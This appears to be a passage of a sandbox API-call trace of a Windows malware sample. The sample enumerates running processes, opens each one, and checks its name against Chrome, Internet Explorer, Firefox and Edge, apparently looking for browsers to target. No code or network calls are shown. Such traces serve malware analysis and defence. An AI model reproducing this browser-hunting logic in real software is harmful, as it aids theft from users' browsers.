	[0204.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2964
	[0204.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.580] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.581] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.581] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.581] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.582] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2968
	[0204.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.582] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.583] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.583] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.583] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.584] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x296c
	[0204.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.584] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.585] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.585] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.585] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.585] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2970
	[0204.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.586] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.587] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.587] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.587] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0204.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2974
	[0204.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.588] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0204.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.588] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0204.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2978
	[0204.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.590] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.590] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.591] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.591] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.591] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0204.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x297c
	[0204.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.593] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.593] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.593] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2980
	[0204.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.598] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.598] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.598] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2984
	[0204.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.599] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.599] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.599] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.600] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.600] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0204.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2988
	[0204.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.601] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0204.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.601] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.601] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0204.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.602] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.602] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0204.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x298c
	[0204.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.603] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0204.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.603] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.603] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0204.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.604] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.604] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0204.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2990
	[0204.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.605] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.605] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.605] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.605] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.606] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0204.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2994
	[0204.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.630] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0204.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.630] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.631] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0204.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.631] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.631] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0204.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0204.632] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0204.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2998
	[0204.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.633] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0204.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.633] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.634] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0204.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.634] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0204.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x299c
	[0204.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.636] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0204.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.636] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.636] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0204.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.636] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0204.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x29a0
	[0204.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.637] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0204.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.638] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.638] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0204.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.638] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.639] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0204.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x29a4
	[0204.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0204.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.640] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.640] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0204.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.640] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0204.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x29a8
	[0204.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.645] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0204.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.646] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.646] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0204.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.647] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.647] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0204.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x29ac
	[0204.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.648] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0204.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.648] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.649] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0204.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.649] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0204.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x29b0
	[0204.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.650] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0204.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.650] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.651] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0204.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.651] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.651] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0204.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x29b4
	[0204.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.652] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0204.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.653] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.653] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0204.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.653] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.654] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0204.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x29b8
	[0204.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.655] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0204.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.655] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.655] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0204.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.655] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.656] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0204.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x29bc
	[0204.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.656] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0204.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.657] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.657] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0204.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.657] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0204.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x29c0
	[0204.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.658] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0204.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.659] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.659] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0204.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.660] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.660] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0204.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x29c4
	[0204.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
